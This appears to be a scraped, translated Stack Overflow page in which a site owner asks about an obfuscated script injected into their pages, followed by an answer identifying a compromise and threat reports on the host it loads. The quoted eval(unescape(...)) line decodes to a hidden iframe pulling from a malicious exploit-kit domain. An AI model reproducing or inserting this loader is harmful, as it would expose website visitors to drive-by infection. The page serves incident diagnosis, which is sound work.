- iOS/Objective-C 元类和类别
- objective-c - -1001 错误,当 NSURLSession 通过 httpproxy 和/etc/hosts
- java - 使用网络类获取 url 地址
- ios - 推送通知中不播放声音
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>
我的网站 www.safwanmanpower.com 在每个页面中都受到恶意软件脚本的攻击我不知道这个脚本是关于这个脚本如何使我的网站受到恶意软件影响的任何人??
希望得到快速和积极的回应。
已编辑
sumone 如何在未经上传许可的情况下攻击我的网站??
最佳答案
您的网站已被已知实体入侵。您的页面现在正在为您的访问者提供漏洞利用,并将他们置于危险之中。
立即关闭您的站点并引用:http://safeweb.norton.com/report/show?name=sedpoo.com
Threat ReportTotal threats found: 4Drive-By Downloads (what's this?)Threats found: 3Here is a complete list: (for more information about a specific threat, click on the Threat Name below)Threat Name: HTTP Malicious Toolkit Variant Activity 15Location: http://sedpoo.com/?687328Threat Name: HTTP Malicious Toolkit Variant Activity 15Location: http://sedpoo.com/?-560137484Threat Name: HTTP Malicious Toolkit Variant Activity 15Location: http://sedpoo.com/?2443640Viruses (what's this?)Threats found: 1Here is a complete list: (for more information about a specific threat, click on the Threat Name below)Threat Name: Trojan.GenLocation: http://sedpoo.com/des.jar
并且:http://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/
What is the current listing status for sedpoo.com?Site is listed as suspicious - visiting this web site may harm your computer.What happened when Google visited this site?Of the 1887 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-01-18, and the last time suspicious content was found on this site was on 2011-01-18.Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting exploit(s).This site was hosted on 8 network(s) including AS4766 (Korea Telecom), AS51306 (UAIP), AS5610 (CZECH).Has this site acted as an intermediary resulting in further distribution of malware?Over the past 90 days, sedpoo.com appeared to function as an intermediary for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, cstbilisi.ge/.Has this site hosted malware?Yes, this site has hosted malicious software over the past 90 days. It infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, bhiee.net/.How did this happen?In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
在您进一步研究威胁并准备好应对可能随之而来的潜在感染之前,我不会访问 sedpoo 攻击站点。启动虚拟机来访问站点是进一步调查的快速方法,而且不会让您的工作站和数据受到损害。
关于javascript - 此站点可能正在分发恶意软件?奇怪的javascript?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/4725641/
我的一个 friend 就他在 Discord 上遇到的问题联系了我。 Windows 询问下面的代码应该用什么程序运行,默认是 Discord。每次运行 Discord 时,都会运行这段代码: im
我收到了一封虚假电子邮件,其中链接了一个网站,---危险--- kadiogluhotel.com/437019344HKFAHDzE9ykByni6Qd2TQSfkSYy2z7=Q7FftdKRHH
关闭。这个问题需要更多focused .它目前不接受答案。 想改进这个问题吗? 更新问题,使其只关注一个问题 editing this post . 关闭 8 年前。 Improve this qu
现在我知道这不是一个安全或恶意软件清除网站。但是我觉得这是一个 JSF 特定的问题, 我注意到我的网站通过将 JavaScript 文件注入(inject)网页而不断受到攻击。 恶意软件正在从具有以下
我们有带有 CentOs 的 AWS ec2 实例。此实例上托管了 4 个站点,一个静态 HTML 和 PHP 站点,两个 Joomla (v3.4.5),一个 Opencart (v2.0.1.1)
我正在帮助某人清除网站上的恶意软件感染,但我很难在 sed 中正确匹配某些字符串,因此我可以创建一个脚本来批量搜索并替换/删除它。 字符串是: document.write('.vb_style_fo
恶意软件是病毒、蠕虫、特洛伊木马以及其他有害计算机程序的总称,并且很早就一直存在。而恶意软件随着时间的失衡不断发展演变,黑客利用它来进行破坏并获取敏感信息。而阻止和打击恶意软件占据了信息安全专业人
在 WiX Burn Bootstrap 中安装某些软件包时,安装会在单击 Trend Micro OfficeScan 安装后不久被中断。它将它检测为潜在的病毒/恶意软件,因为它试图写入注册表位置,
我发现每次网站加载时都会加载以下代码,请在我的博客上回复我它的功能吗?, themenest.net 是我看到的 url,当我看到加载我的网站时 eval(function (p, a, c
关闭。这个问题需要更多focused .它目前不接受答案。 想改进这个问题吗? 更新问题,使其只关注一个问题 editing this post . 关闭 5 年前。 Improve this qu
我在 Ubuntu 16.04.02 LTS 服务器上使用 Wildfly 10.1.0.Final,我将来自 letsencrypt.org 的 SSL 与 H2 (HTTP 2) 协议(proto
关闭。这个问题是opinion-based .它目前不接受答案。 想改善这个问题吗?更新问题,以便可以通过 editing this post 用事实和引文回答问题. 6年前关闭。 Improve t
我正在尝试开发一个能够使用支持向量机 (SVM) 检测 Android 平台恶意应用程序的应用程序。我可以从“logcat”和“strace”工具中获取许多系统信息,但我现在不知道如何设法检测真正的恶
我有三个网站都托管在同一个网络服务器上。最近我在其中一个网站上工作,注意到大约一个月前,一堆文件被更改了。具体来说,index.html 的所有实例都已重命名为 index.html.bak.bak,
我们在多台服务器上托管了 1000 多个域。我们遇到大量恶意软件和 phpshell 的问题。许多扫描仪的使用对取缔它们没有任何影响。也许我们从那些扫描仪中得到了 10/20 的模糊结果 所以我构建了
关闭。这个问题不符合Stack Overflow guidelines .它目前不接受答案。 我们不允许在 Stack Overflow 上提出有关专业服务器或网络相关基础设施管理的问题。您可以编辑问
我正在编写一个使用 SFML 进行渲染/输入的程序。问题是大多数防病毒程序将其检测为某种恶意软件。其中一些会在程序启动时立即显示警报(即使在 visual studio 中处于 Debug模式),而另
使用 Java 已有多年,但最近关于 JRE 零日漏洞利用的警告令人不安。 我正在考虑以下方法(全部在 Windows 7 Ultimate/64 位计算机上): 在所有浏览器中禁用 Java(早就完
今天,我们从一位客户那里收到了有关此恶意软件检测的信息: Gen:Variant.Adware.Kazy.795337 它仅在通过 qtdeploy 进程附加到我们项目的 qwebp.dll 文件中。
我是一名优秀的程序员,十分优秀!